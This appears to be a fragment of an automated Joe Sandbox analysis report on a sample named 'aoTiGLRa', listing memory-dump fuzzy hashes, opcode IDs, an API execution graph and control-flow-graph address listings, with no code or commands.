                                                                                                                            • Instruction Fuzzy Hash: B5E0C23290520CDFD700DBB0C4087ADB7FDEB46210F0008AAE90593110EA311A249781
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1379377880.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_5950000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1fe53e7d0bd968083bcfbc5df4d99809cd4fd7c2991b990967c3d561af59f38d
                                                                                                                            • Instruction ID: 89ba7a4b802ce028b99df9b030b916e8bde4635d839be4c51ab3817b243d545f
                                                                                                                            • Opcode Fuzzy Hash: 1fe53e7d0bd968083bcfbc5df4d99809cd4fd7c2991b990967c3d561af59f38d
                                                                                                                            • Instruction Fuzzy Hash: ABE01274908208DFC704DFA4D54556CFBB9FB46325F2085A9CC0917345CB725E56DB81
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1379377880.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_5950000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1fe53e7d0bd968083bcfbc5df4d99809cd4fd7c2991b990967c3d561af59f38d
                                                                                                                            • Instruction ID: 1f5ba573a7bd449c463e15181c9ac0f80fe714b30505c22077e3548c3550eb1c
                                                                                                                            • Opcode Fuzzy Hash: 1fe53e7d0bd968083bcfbc5df4d99809cd4fd7c2991b990967c3d561af59f38d
                                                                                                                            • Instruction Fuzzy Hash: 0EE01235A0C208DBC704DFA4D54556CFBB9FB46315F208599DC0917341CB726E56DB91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1379377880.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_5950000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1fe53e7d0bd968083bcfbc5df4d99809cd4fd7c2991b990967c3d561af59f38d
                                                                                                                            • Instruction ID: 2fece2aefcf77fed26269d2995fa6a666ef8f5c665d7e09508668a8218062a41
                                                                                                                            • Opcode Fuzzy Hash: 1fe53e7d0bd968083bcfbc5df4d99809cd4fd7c2991b990967c3d561af59f38d
                                                                                                                            • Instruction Fuzzy Hash: D2E0EC75908208DBC704DFA4D5455ACFBBDAB46325F2085A9CC0917341CB726E56DB85
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1379377880.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_5950000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c677ae336e27d0ef4362279e0751b1e906669b9efded6c05b9007be57e64d16d
                                                                                                                            • Instruction ID: 1e61817a9c5c9d65a086a2cc60db3e320e0ac285b5130dc652a098119f18c513
                                                                                                                            • Opcode Fuzzy Hash: c677ae336e27d0ef4362279e0751b1e906669b9efded6c05b9007be57e64d16d
                                                                                                                            • Instruction Fuzzy Hash: 90E046B0D00209DFC740EFB9C904B5EBBF0BF08710F1089A9C419E7221E77486008F80
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1379377880.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_5950000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 432ca64e574304dcc58c030527e308abfe513fe5d5026301df0939860bb7f8b7
                                                                                                                            • Instruction ID: e3f5dcbce72f9c78653aa450e9d02fae5798d968816564a4484743c60b7672b8
                                                                                                                            • Opcode Fuzzy Hash: 432ca64e574304dcc58c030527e308abfe513fe5d5026301df0939860bb7f8b7
                                                                                                                            • Instruction Fuzzy Hash: 3DD05E31508208DBC704DA94D945A68FBBDEB46225F10449D8C0993341DB72AD12D781
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1379377880.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_5950000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: d21e042a4830f2dd03dd97481504891037b84d8c5002e70e20adafcd3c69738e
                                                                                                                            • Instruction ID: 0af2a1f2de7414828e65fb8c9c79a750cef979f41250c0207dab0eab4c5c3e15
                                                                                                                            • Opcode Fuzzy Hash: d21e042a4830f2dd03dd97481504891037b84d8c5002e70e20adafcd3c69738e
                                                                                                                            • Instruction Fuzzy Hash: 18D0222810C3814FD202EF7C0CD86CBBF80AEA671070E8DD3A4480606289020A2F8366
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1379377880.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_5950000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 26d75fd52f21452f54a02a926ded590b1fee2b3f160989f6e55881dca05a295e
                                                                                                                            • Instruction ID: c74a06ea02bb8512bf02b2c59cfa4ae301822acaff55fc418fbc1f7fbf9d023f
                                                                                                                            • Opcode Fuzzy Hash: 26d75fd52f21452f54a02a926ded590b1fee2b3f160989f6e55881dca05a295e
                                                                                                                            • Instruction Fuzzy Hash: 97D017B8C081298BEB14DF648881BBAB7B9BB59314F0015D4C85E9630ADA301A41CF41
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1379377880.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_5950000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cf835d83e14bcc2755f23261853a2d7cf82ed6a3df7a604cf0f46280414bb8e9
                                                                                                                            • Instruction ID: 93e145a49946f83393aa32cdb837f00727e4af091a3d2bc4e16a1f57fa07172c
                                                                                                                            • Opcode Fuzzy Hash: cf835d83e14bcc2755f23261853a2d7cf82ed6a3df7a604cf0f46280414bb8e9
                                                                                                                            • Instruction Fuzzy Hash: D8D012332901096E8B41EFA5E800C52B7DDBB587207008862F948CB121E622F534DB91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1379377880.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_5950000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: e9dcca88796eec3a81680bf8b390ae5d3151e1198c121066124ea3b670fdb03b
                                                                                                                            • Instruction ID: 336421f591d2faa387cf448cb7e9e4b26e265ea064990d3a76c9f87af566dd24
                                                                                                                            • Opcode Fuzzy Hash: e9dcca88796eec3a81680bf8b390ae5d3151e1198c121066124ea3b670fdb03b
                                                                                                                            • Instruction Fuzzy Hash: 38D012347442089FEF109B72D80CB257AADFB40361F409436E915C6351DB32D4A4CB51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1379377880.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_5950000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c2a5a9d03a368461139a906664e8a13e9cebebe23252163049b3f0b4ad8ef54e
                                                                                                                            • Instruction ID: ef9d4715b80aaa0c91304d351759019aa22101876f088aefb0eff9bac166d920
                                                                                                                            • Opcode Fuzzy Hash: c2a5a9d03a368461139a906664e8a13e9cebebe23252163049b3f0b4ad8ef54e
                                                                                                                            • Instruction Fuzzy Hash: A4C08C39B80100CEEB1086B1E80C72561A8F740221F88942AD912C6380E636C4688B10
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1379377880.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_5950000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: f19e2fc9c384c8290621e87fc263d9653196a830b2da8e77978c07bf1c670cb5
                                                                                                                            • Instruction ID: 71c2d07135097079f04981dea474e65de199117ef7c9f286800df5c903540829
                                                                                                                            • Opcode Fuzzy Hash: f19e2fc9c384c8290621e87fc263d9653196a830b2da8e77978c07bf1c670cb5
                                                                                                                            • Instruction Fuzzy Hash: C3C09BB72B851257E551F554CC477CFB3409B70704F155421910586593DA15D023B39B
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000011.00000002.1379377880.0000000005950000.00000040.00000800.00020000.00000000.sdmp, Offset: 05950000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_17_2_5950000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 96f59ddf197715ee513f53db05b459ff3ef5e889cfd0c332576f3664bf9eb956
                                                                                                                            • Instruction ID: d60b989f2dd79a4952a1ab718e62b4d7239c8cb7cf8b020237e0bee923d428d6
                                                                                                                            • Opcode Fuzzy Hash: 96f59ddf197715ee513f53db05b459ff3ef5e889cfd0c332576f3664bf9eb956
                                                                                                                            • Instruction Fuzzy Hash: 9BB012752A9300A75000FFB44C45F1F5145EBE1B20F01DC427609000108927653BD71F

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:11.8%
                                                                                                                            Dynamic/Decrypted Code Coverage:100%
                                                                                                                            Signature Coverage:0%
                                                                                                                            Total number of Nodes:82
                                                                                                                            Total number of Limit Nodes:10
                                                                                                                            execution_graph 39823 1489c18 39824 1489c25 39823->39824 39825 1489c1f 39823->39825 39825->39824 39828 1489fa6 39825->39828 39829 1489328 39825->39829 39827 1489328 LdrInitializeThunk 39827->39828 39828->39824 39828->39827 39830 148933a 39829->39830 39832 148933f 39829->39832 39830->39828 39831 1489a69 LdrInitializeThunk 39831->39830 39832->39830 39832->39831 39833 166c960 39834 166c9a6 39833->39834 39838 166cb40 39834->39838 39841 166cb30 39834->39841 39835 166ca93 39845 166c824 39838->39845 39842 166cb40 39841->39842 39843 166c824 DuplicateHandle 39842->39843 39844 166cb6e 39843->39844 39844->39835 39846 166cba8 DuplicateHandle 39845->39846 39847 166cb6e 39846->39847 39847->39835 39848 32ee018 39849 32ee024 39848->39849 39862 1482968 39849->39862 39869 148295a 39849->39869 39850 32ee0c3 39876 148e258 39850->39876 39880 148e257 39850->39880 39851 32ee0ed 39884 15a7b78 39851->39884 39891 15a7b69 39851->39891 39852 32ee1d4 39898 148fc68 39852->39898 39902 148fc5a 39852->39902 39853 32ee61f 39863 148298a 39862->39863 39864 1482a56 39863->39864 39866 1489328 LdrInitializeThunk 39863->39866 39906 1489318 39863->39906 39912 148992c 39863->39912 39918 1489548 39863->39918 39864->39850 39866->39864 39870 148298a 39869->39870 39871 1482a56 39870->39871 39872 1489318 2 API calls 39870->39872 39873 1489328 LdrInitializeThunk 39870->39873 39874 1489548 2 API calls 39870->39874 39875 148992c 2 API calls 39870->39875 39871->39850 39872->39871 39873->39871 39874->39871 39875->39871 39877 148e27a 39876->39877 39878 1489548 2 API calls 39877->39878 39879 148e344 39877->39879 39878->39879 39879->39851 39881 148e27a 39880->39881 39882 1489548 2 API calls 39881->39882 39883 148e344 39881->39883 39882->39883 39883->39851 39885 15a7b9a 39884->39885 39886 15a7cac 39885->39886 39887 1489318 2 API calls 39885->39887 39888 1489328 LdrInitializeThunk 39885->39888 39889 1489548 2 API calls 39885->39889 39890 148992c 2 API calls 39885->39890 39886->39852 39887->39886 39888->39886 39889->39886 39890->39886 39892 15a7b70 39891->39892 39893 15a7cac 39892->39893 39894 1489318 2 API calls 39892->39894 39895 1489328 LdrInitializeThunk 39892->39895 39896 1489548 2 API calls 39892->39896 39897 148992c 2 API calls 39892->39897 39893->39852 39894->39893 39895->39893 39896->39893 39897->39893 39899 148fc8a 39898->39899 39900 1489548 2 API calls 39899->39900 39901 148fd3a 39899->39901 39900->39901 39901->39853 39903 148fc8a 39902->39903 39904 1489548 2 API calls 39903->39904 39905 148fd3a 39903->39905 39904->39905 39905->39853 39907 148933a 39906->39907 39911 148933f 39906->39911 39907->39864 39908 1489924 LdrInitializeThunk 39908->39907 39910 1489328 LdrInitializeThunk 39910->39911 39911->39907 39911->39908 39911->39910 39916 14897e3 39912->39916 39914 1489924 LdrInitializeThunk 39915 1489a81 39914->39915 39915->39864 39916->39914 39917 1489328 LdrInitializeThunk 39916->39917 39917->39916 39920 1489579 39918->39920 39919 14896d9 39919->39864 39920->39919 39922 1489924 LdrInitializeThunk 39920->39922 39923 1489328 LdrInitializeThunk 39920->39923 39922->39919 39923->39920

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 149 32ec147-32ec158 150 32ec15a-32ec172 149->150 151 32ec184 149->151 155 32ec17b-32ec17e 150->155 156 32ec174-32ec179 150->156 152 32ec186-32ec18a 151->152 157 32ec18b-32ec199 155->157 158 32ec180-32ec182 155->158 156->152 160 32ec19b-32ec1a1 157->160 161 32ec123-32ec129 157->161 158->150 158->151 162 32ec12b-32ec135 160->162 163 32ec1a3-32ec1c8 160->163 164 32ec137-32ec145 162->164 165 32ec103-32ec10f 162->165 166 32ec1cf-32ec2ac call 32e41a0 call 32e3cc0 163->166 167 32ec1ca 163->167 168 32ec115-32ec117 165->168 169 32ec111 165->169 193 32ec2ae 166->193 194 32ec2b3-32ec2e4 call 32e5658 166->194 167->166 173 32ec118-32ec11b 168->173 171 32ec113 169->171 172 32ec131-32ec145 169->172 171->168 174 32ec12c 173->174 175 32ec11d-32ec120 173->175 174->172 178 32ec0cf-32ec0d9 175->178 179 32ec122 175->179 178->172 180 32ec0db-32ec0f3 178->180 179->161 180->173 187 32ec0f5-32ec0fb 180->187 187->172 189 32ec0fd-32ec111 187->189 189->171 189->172 193->194 197 32ec2eb-32ec2ef 194->197 198 32ec2e6 194->198 199 32ec2f4-32ec2fb 197->199 200 32ec2f1-32ec2f2 197->200 198->197 202 32ec2fd 199->202 203 32ec302-32ec310 199->203 201 32ec313-32ec357 200->201 207 32ec3bd-32ec3d4 201->207 202->203 203->201 209 32ec359-32ec36f 207->209 210 32ec3d6-32ec3f9 207->210 214 32ec399 209->214 215 32ec371-32ec37d 209->215 217 32ec3fb 210->217 216 32ec39f-32ec3bc 214->216 218 32ec37f-32ec385 215->218 219 32ec387-32ec38d 215->219 216->207 220 32ec3fd-32ec412 217->220 221 32ec413-32ec471 217->221 222 32ec397 218->222 219->222 220->221 221->217 228 32ec473-32ec498 221->228 222->216 229 32ec49f-32ec57c call 32e41a0 call 32e3cc0 228->229 230 32ec49a 228->230 240 32ec57e 229->240 241 32ec583-32ec5a4 call 32e5658 229->241 230->229 240->241 243 32ec5a9-32ec5b4 241->243 244 32ec5bb-32ec5bf 243->244 245 32ec5b6 243->245 246 32ec5c4-32ec5cb 244->246 247 32ec5c1-32ec5c2 244->247 245->244 249 32ec5cd 246->249 250 32ec5d2-32ec5e0 246->250 248 32ec5e3-32ec627 247->248 254 32ec68d-32ec6a4 248->254 249->250 250->248 256 32ec629-32ec63f 254->256 257 32ec6a6-32ec6cb 254->257 261 32ec669 256->261 262 32ec641-32ec64d 256->262 266 32ec6cd-32ec6e2 257->266 267 32ec6e3 257->267 265 32ec66f-32ec68c 261->265 263 32ec64f-32ec655 262->263 264 32ec657-32ec65d 262->264 268 32ec667 263->268 264->268 265->254 266->267 268->265
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Dp$0oKp$LjKp$LjKp$PHq$PHq
                                                                                                                            • API String ID: 0-2599153934
                                                                                                                            • Opcode ID: 03cde44d2488051c1d91e06ca2a0cb4ce3b3462813dabf032219e51a1254e4d9
                                                                                                                            • Instruction ID: 5fc91d0b94c9ff9507ce79009c7aa24d4023e865ddbc8bff8fd3506526aeb68b
                                                                                                                            • Opcode Fuzzy Hash: 03cde44d2488051c1d91e06ca2a0cb4ce3b3462813dabf032219e51a1254e4d9
                                                                                                                            • Instruction Fuzzy Hash: 59B11A75E10218DFDB14CFA9D885A9DBBF2FF89310F54806AE809AB361DB349881CF51

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 272 32ec468-32ec471 273 32ec3fb 272->273 274 32ec473-32ec498 272->274 277 32ec3fd-32ec412 273->277 278 32ec413-32ec414 273->278 275 32ec49f-32ec4e7 274->275 276 32ec49a 274->276 282 32ec4ef-32ec4fe call 32e41a0 275->282 276->275 277->278 278->272 285 32ec503-32ec57c call 32e3cc0 282->285 291 32ec57e 285->291 292 32ec583-32ec5a4 call 32e5658 285->292 291->292 294 32ec5a9-32ec5b4 292->294 295 32ec5bb-32ec5bf 294->295 296 32ec5b6 294->296 297 32ec5c4-32ec5cb 295->297 298 32ec5c1-32ec5c2 295->298 296->295 300 32ec5cd 297->300 301 32ec5d2-32ec5e0 297->301 299 32ec5e3-32ec627 298->299 305 32ec68d-32ec6a4 299->305 300->301 301->299 307 32ec629-32ec63f 305->307 308 32ec6a6-32ec6cb 305->308 312 32ec669 307->312 313 32ec641-32ec64d 307->313 317 32ec6cd-32ec6e2 308->317 318 32ec6e3 308->318 316 32ec66f-32ec68c 312->316 314 32ec64f-32ec655 313->314 315 32ec657-32ec65d 313->315 319 32ec667 314->319 315->319 316->305 317->318 319->316
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 0oKp$LjKp$LjKp$PHq$PHq$PHq
                                                                                                                            • API String ID: 0-1343623787
                                                                                                                            • Opcode ID: 4b5e98d3d7c52e06a05841b13544e0f5b33ff6541589550aefc06bd123c872ed
                                                                                                                            • Instruction ID: d954f011cb3cf3111478def917f1efec9ad10c386228cf65221c02182343dc25
                                                                                                                            • Opcode Fuzzy Hash: 4b5e98d3d7c52e06a05841b13544e0f5b33ff6541589550aefc06bd123c872ed
                                                                                                                            • Instruction Fuzzy Hash: 8291C474E10218DFDB14DFAAD884A9DBBF2FF89300F149069E819AB354DB749981CF51

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 432 32e5362-32e5364 433 32e5366-32e53a0 432->433 434 32e53c4-32e5484 call 32e41a0 call 32e3cc0 432->434 435 32e53a7-32e53c2 433->435 436 32e53a2 433->436 446 32e548b-32e54a9 434->446 447 32e5486 434->447 435->434 436->435 477 32e54ac call 32e5658 446->477 478 32e54ac call 32e5649 446->478 447->446 448 32e54b2-32e54bd 449 32e54bf 448->449 450 32e54c4-32e54c8 448->450 449->450 451 32e54cd-32e54d4 450->451 452 32e54ca-32e54cb 450->452 454 32e54db-32e54e9 451->454 455 32e54d6 451->455 453 32e54ec-32e5530 452->453 459 32e5596-32e55ad 453->459 454->453 455->454 461 32e55af-32e55d4 459->461 462 32e5532-32e5548 459->462 468 32e55ec 461->468 469 32e55d6-32e55eb 461->469 466 32e554a-32e5556 462->466 467 32e5572 462->467 470 32e5558-32e555e 466->470 471 32e5560-32e5566 466->471 472 32e5578-32e5595 467->472 469->468 473 32e5570 470->473 471->473 472->459 473->472 477->448 478->448
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 0oKp$LjKp$LjKp$PHq$PHq
                                                                                                                            • API String ID: 0-2065946399
                                                                                                                            • Opcode ID: 151dc6fa08c5bbed9d2bd8f4c875ca6edd607b69539ce2ab2ce261a5e7323b9f
                                                                                                                            • Instruction ID: da12018b1274b4a027165c6c3823bf7520aebffb36192f80d1134140dd51706d
                                                                                                                            • Opcode Fuzzy Hash: 151dc6fa08c5bbed9d2bd8f4c875ca6edd607b69539ce2ab2ce261a5e7323b9f
                                                                                                                            • Instruction Fuzzy Hash: 8291E774E10218DFDB14CFA9D884A9DBBF2FF89300F248069E819AB365DB349981CF50

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 479 32eca08-32eca38 481 32eca3f-32ecb1c call 32e41a0 call 32e3cc0 479->481 482 32eca3a 479->482 492 32ecb1e 481->492 493 32ecb23-32ecb44 call 32e5658 481->493 482->481 492->493 495 32ecb49-32ecb54 493->495 496 32ecb5b-32ecb5f 495->496 497 32ecb56 495->497 498 32ecb64-32ecb6b 496->498 499 32ecb61-32ecb62 496->499 497->496 501 32ecb6d 498->501 502 32ecb72-32ecb80 498->502 500 32ecb83-32ecbc7 499->500 506 32ecc2d-32ecc44 500->506 501->502 502->500 508 32ecbc9-32ecbdf 506->508 509 32ecc46-32ecc6b 506->509 513 32ecc09 508->513 514 32ecbe1-32ecbed 508->514 516 32ecc6d-32ecc82 509->516 517 32ecc83 509->517 515 32ecc0f-32ecc2c 513->515 518 32ecbef-32ecbf5 514->518 519 32ecbf7-32ecbfd 514->519 515->506 516->517 520 32ecc07 518->520 519->520 520->515
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 0oKp$LjKp$LjKp$PHq$PHq
                                                                                                                            • API String ID: 0-2065946399
                                                                                                                            • Opcode ID: f9908cff0fb70c634860d9351ef533476ea23598fd72a15dcecb87dfa5dcbf08
                                                                                                                            • Instruction ID: 3d86b8c0f598025c1679cccd61dbd2e8d1fbba3c2ea4651303a40ab30e2aaa11
                                                                                                                            • Opcode Fuzzy Hash: f9908cff0fb70c634860d9351ef533476ea23598fd72a15dcecb87dfa5dcbf08
                                                                                                                            • Instruction Fuzzy Hash: 3C81C374E10218DFDB14DFAAD844A9DBBF2BF89300F14D069E819AB365DB349981CF51

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 568 32ed278-32ed2a8 569 32ed2af-32ed38c call 32e41a0 call 32e3cc0 568->569 570 32ed2aa 568->570 580 32ed38e 569->580 581 32ed393-32ed3b4 call 32e5658 569->581 570->569 580->581 583 32ed3b9-32ed3c4 581->583 584 32ed3cb-32ed3cf 583->584 585 32ed3c6 583->585 586 32ed3d4-32ed3db 584->586 587 32ed3d1-32ed3d2 584->587 585->584 589 32ed3dd 586->589 590 32ed3e2-32ed3f0 586->590 588 32ed3f3-32ed437 587->588 594 32ed49d-32ed4b4 588->594 589->590 590->588 596 32ed439-32ed44f 594->596 597 32ed4b6-32ed4db 594->597 601 32ed479 596->601 602 32ed451-32ed45d 596->602 604 32ed4dd-32ed4f2 597->604 605 32ed4f3 597->605 603 32ed47f-32ed49c 601->603 606 32ed45f-32ed465 602->606 607 32ed467-32ed46d 602->607 603->594 604->605 608 32ed477 606->608 607->608 608->603
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 0oKp$LjKp$LjKp$PHq$PHq
                                                                                                                            • API String ID: 0-2065946399
                                                                                                                            • Opcode ID: bd618b5797514128654a72a3bf0b664f0a555780310194c2d6a6788f6e0a7267
                                                                                                                            • Instruction ID: b8667180c10c5c836bf66c4f7e422d37043ff4a97d6ea7360188a194227e6ae3
                                                                                                                            • Opcode Fuzzy Hash: bd618b5797514128654a72a3bf0b664f0a555780310194c2d6a6788f6e0a7267
                                                                                                                            • Instruction Fuzzy Hash: 8881B275E10218CFDB14DFAAD984A9DFBF2BF89300F548069E809AB365DB349981CF51

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 524 32eccd8-32ecd08 525 32ecd0f-32ecdec call 32e41a0 call 32e3cc0 524->525 526 32ecd0a 524->526 536 32ecdee 525->536 537 32ecdf3-32ece14 call 32e5658 525->537 526->525 536->537 539 32ece19-32ece24 537->539 540 32ece2b-32ece2f 539->540 541 32ece26 539->541 542 32ece34-32ece3b 540->542 543 32ece31-32ece32 540->543 541->540 545 32ece3d 542->545 546 32ece42-32ece50 542->546 544 32ece53-32ece97 543->544 550 32ecefd-32ecf14 544->550 545->546 546->544 552 32ece99-32eceaf 550->552 553 32ecf16-32ecf3b 550->553 557 32eced9 552->557 558 32eceb1-32ecebd 552->558 560 32ecf3d-32ecf52 553->560 561 32ecf53 553->561 559 32ecedf-32ecefc 557->559 562 32ecebf-32ecec5 558->562 563 32ecec7-32ececd 558->563 559->550 560->561 564 32eced7 562->564 563->564 564->559
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000014.00000002.3699429060.00000000032E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 032E0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_20_2_32e0000_aoTiGLRa.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 0oKp$LjKp$LjKp$PHq$PHq
                                                                                                                            • API String ID: 0-2065946399
                                                                                                                            • Opcode ID: 53197871d9753889343b8a512d9b8064fa25da7deffa1e10832bef13592b2b80
                                                                                                                            • Instruction ID: 2129bf9ae80525fd37d8af49d5aaeb92ac1d5e9e4e5309ce5257ea962261acce
                                                                                                                            • Opcode Fuzzy Hash: 53197871d9753889343b8a512d9b8064fa25da7deffa1e10832bef13592b2b80
                                                                                                                            • Instruction Fuzzy Hash: D281B274E10218DFDB14DFAAD944A9DBBF2BF89300F18C069E819AB365DB349981CF51

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
